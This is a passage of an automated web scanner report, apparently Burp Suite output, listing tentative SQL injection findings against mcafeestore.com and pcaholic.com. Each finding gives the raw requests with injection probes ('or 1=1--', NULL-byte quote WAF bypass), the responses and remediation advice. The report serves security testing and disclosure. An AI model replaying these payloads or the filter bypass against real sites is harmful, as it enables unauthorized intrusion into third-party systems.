Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=94873494588,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


1.5. http://www.mcafeestore.com/store/mfe/en_GB/pd/productID.208082000 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mcafeestore.com
Path:   /store/mfe/en_GB/pd/productID.208082000

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /store/mfe/en_GB/pd/productID.208082000 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64808723128,0)
Content-Length: 32159
Date: Fri, 30 Sep 2011 12:44:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<span class="dr_error" id="qty_error_span">
...[SNIP]...
.getElementById('quantity');
// Returns true when the quantity is a positive integer
function validQty(qty) {
return /^[1-9]\d*$/.test(qty);
}
// Switch the class when the quantity is invalid
function setQtyFocus() {
if (!validQty(qtyField.value)) {
qtyField.className = ErrorFocusClassName;
}
}
// Resets the quantity field class when the user tabs off the field

...[SNIP]...

Request 2

GET /store/mfe/en_GB/pd/productID.208082000 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: https://www.mcafeestore.com/store?Action=pd&Env=BASE&Locale=en_GB&SiteID=mfe&productID=208082000
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=64808723471,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


1.6. http://www.mcafeestore.com/store/mfe/en_GB/pd/productID.237091200 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mcafeestore.com
Path:   /store/mfe/en_GB/pd/productID.237091200

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /store/mfe/en_GB/pd/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859050158,0)
Content-Length: 31552
Date: Fri, 30 Sep 2011 12:44:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<span class="dr_error" id="qty_error_span">
...[SNIP]...
.getElementById('quantity');
// Returns true when the quantity is a positive integer
function validQty(qty) {
return /^[1-9]\d*$/.test(qty);
}
// Switch the class when the quantity is invalid
function setQtyFocus() {
if (!validQty(qtyField.value)) {
qtyField.className = ErrorFocusClassName;
}
}
// Resets the quantity field class when the user tabs off the field

...[SNIP]...

Request 2

GET /store/mfe/en_GB/pd/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: https://www.mcafeestore.com/store?Action=pd&Env=BASE&Locale=en_GB&SiteID=mfe&productID=237091200
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=103463429157,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


1.7. http://www.pcaholic.com/wp-content/plugins/contact-form-7/jquery.form.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-content/plugins/contact-form-7/jquery.form.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13737313%20or%201%3d1--%20 and 13737313%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/contact-form-7/jquery.form.js?113737313%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:39 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-content Plugins Contact-form-7 Jquery Form Js?113737313%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/j
...[SNIP]...

Request 2

GET /wp-content/plugins/contact-form-7/jquery.form.js?113737313%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 17 Aug 2011 00:18:29 GMT
ETag: "25d80c2-6883-4aaa86f841f40"
Accept-Ranges: bytes
Content-Length: 26755
Vary: User-Agent
Connection: close
Content-Type: application/javascript

/*!
* jQuery Form Plugin
* version: 2.83 (11-JUL-2011)
* @requires jQuery v1.3.2 or later
*
* Examples and documentation at: http://malsup.com/jquery/form/
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*/
;(function($) {

/*
   Usage Note:
   -----------
   Do not use both ajaxSubmit and ajaxForm on the same form. These
   functions are intended to be exclusive. Use ajaxSubmit if you want
   to bind your own submit handler to the form. For example,

   $(document).ready(function() {
       $('#myForm').bind('submit', function(e) {
           e.preventDefault(); // <-- important
           $(this).ajaxSubmit({
               target: '#output'
           });
       });
   });

   Use ajaxForm when you want the plugin to manage all the event binding
   for you. For example,

   $(document).ready(function() {
       $('#myForm').ajaxForm({
           target: '#output'
       });
   });

   When using ajaxForm, the ajaxSubmit function will be invoked for you
   at the appropriate time.
*/

/**
* ajaxSubmit() provides a mechanism for immediately submitting
* an HTML form using AJAX.
*/
$.fn.ajaxSubmit = function(options) {
   // fast fail if nothing selected (http://dev.jquery.com/ticket/2752)
   if (!this.length) {
       log('ajaxSubmit: skipping submit process - no element selected');
       return this;
   }
   
   var method, action, url, $form = this;

   if (typeof options == 'function') {
       options = { success: options };
   }

   method = this.attr('method');
   action = this.attr('action');
   url = (typeof action === 'string') ? $.trim(action) : '';
   url = url || window.location.href || '';
   if (url)
...[SNIP]...

1.8. http://www.pcaholic.com/wp-content/plugins/contact-form-7/scripts.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10647341%20or%201%3d1--%20 and 10647341%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/contact-form-7/scripts.js?110647341%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:38 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-content Plugins Contact-form-7 Scripts Js?110647341%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jq
...[SNIP]...

Request 2

GET /wp-content/plugins/contact-form-7/scripts.js?110647341%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 17 Aug 2011 00:18:29 GMT
ETag: "25d8138-16aa-4aaa86f841f40"
Accept-Ranges: bytes
Content-Length: 5802
Vary: User-Agent
Connection: close
Content-Type: application/javascript

(function($) {

   $(function() {
       try {
           if (typeof _wpcf7 == 'undefined' || _wpcf7 === null)
               _wpcf7 = {};

           _wpcf7 = $.extend({ cached: 0 }, _wpcf7);

           $('div.wpcf7 > form').ajaxForm({
               beforeSubmit: function(formData, jqForm, options) {
                   jqForm.wpcf7ClearResponseOutput();
                   jqForm.find('img.ajax-loader').css({ visibility: 'visible' });
                   return true;
               },
               beforeSerialize: function(jqForm, options) {
                   jqForm.find('.wpcf7-use-title-as-watermark.watermark').each(function(i, n) {
                       $(n).val('');
                   });
                   return true;
               },
               data: { '_wpcf7_is_ajax_call': 1 },
               dataType: 'json',
               success: function(data) {
                   var ro = $(data.into).find('div.wpcf7-response-output');
                   $(data.into).wpcf7ClearResponseOutput();

                   if (data.invalids) {
                       $.each(data.invalids, function(i, n) {
                           $(data.into).find(n.into).wpcf7NotValidTip(n.message);
                       });
                       ro.addClass('wpcf7-validation-errors');
                   }

                   if (data.captcha)
                       $(data.into).wpcf7RefillCaptcha(data.captcha);

                   if (data.quiz)
                       $(data.into).wpcf7RefillQuiz(data.quiz);

                   if (1 == data.spam)
                       ro.addClass('wpcf7-spam-blocked');

                   if (1 == data.mailSent) {
                       $(data.into).find('form').resetForm().clearForm();
                       ro.addClass('wpcf7-mail-sent-ok');

                       if (data.onSentOk)
                           $.each(data.onSentOk, function(i, n) { eval(n) });
                   } else {
                       ro.addClass('wpcf7-mail-sent-ng');
                   }

                   if (data.onSubmit)
                       $.each(data.onSubmit, function(i, n) { eval(n) });

                   $(data.into).find('.wpcf7-use
...[SNIP]...

1.9. http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-content/plugins/contact-form-7/styles.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 33260542%20or%201%3d1--%20 and 33260542%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/contact-form-7/styles.css?133260542%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:35 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-content Plugins Contact-form-7 Styles Css?133260542%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jq
...[SNIP]...

Request 2

GET /wp-content/plugins/contact-form-7/styles.css?133260542%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 17 Aug 2011 00:18:29 GMT
ETag: "25d80c6-3b7-4aaa86f841f40"
Accept-Ranges: bytes
Content-Length: 951
Vary: User-Agent
Connection: close
Content-Type: text/css

div.wpcf7 {
   margin: 0;
   padding: 0;
}

div.wpcf7-response-output {
   margin: 2em 0.5em 1em;
   padding: 0.2em 1em;
}

div.wpcf7-mail-sent-ok {
   border: 2px solid #398f14;
}

div.wpcf7-mail-sent-ng {
   border: 2px solid #ff0000;
}

div.wpcf7-spam-blocked {
   border: 2px solid #ffa500;
}

div.wpcf7-validation-errors {
   border: 2px solid #f7e700;
}

span.wpcf7-form-control-wrap {
   position: relative;
}

span.wpcf7-not-valid-tip {
   position: absolute;
   top: 20%;
   left: 20%;
   z-index: 100;
   background: #fff;
   border: 1px solid #ff0000;
   font-size: 10pt;
   width: 280px;
   padding: 2px;
}

span.wpcf7-not-valid-tip-no-ajax {
   color: #f00;
   font-size: 10pt;
   display: block;
}

span.wpcf7-list-item {
   margin-left: 0.5em;
}

.wpcf7-display-none {
   display: none;
}

div.wpcf7 img.ajax-loader {
   border: none;
   vertical-align: middle;
   margin-left: 4px;
}

div.wpcf7 .watermark {
   color: #888;
}

1.10. http://www.pcaholic.com/wp-content/plugins/sociable/addtofavorites.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-content/plugins/sociable/addtofavorites.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 89917484%20or%201%3d1--%20 and 89917484%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/sociable/addtofavorites.js?189917484%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:39 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-content Plugins Sociable Addtofavorites Js?189917484%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/j
...[SNIP]...

Request 2

GET /wp-content/plugins/sociable/addtofavorites.js?189917484%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 18 Mar 2011 16:11:29 GMT
ETag: "25d855c-23c-49ec407d4ae40"
Accept-Ranges: bytes
Content-Length: 572
Vary: User-Agent
Connection: close
Content-Type: application/javascript

function AddToFavorites()
{
var title = document.title; var url = location.href;
if (window.sidebar) // Firefox
window.sidebar.addPanel(title, url, '');
else if(window.opera && window.print) // Opera
{
var elem = document.createElement('a');
elem.setAttribute('href',url);
elem.setAttribute('title',title);
elem.setAttribute('rel','sidebar'); // required to work in opera 7+
elem.click();
}
else if(document.all) // IE
window.external.AddFavorite(url, title);
}

1.11. http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14496072%20or%201%3d1--%20 and 14496072%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/sociable/sociable.css?114496072%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:37 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-content Plugins Sociable Sociable Css?114496072%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jquery
...[SNIP]...

Request 2

GET /wp-content/plugins/sociable/sociable.css?114496072%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
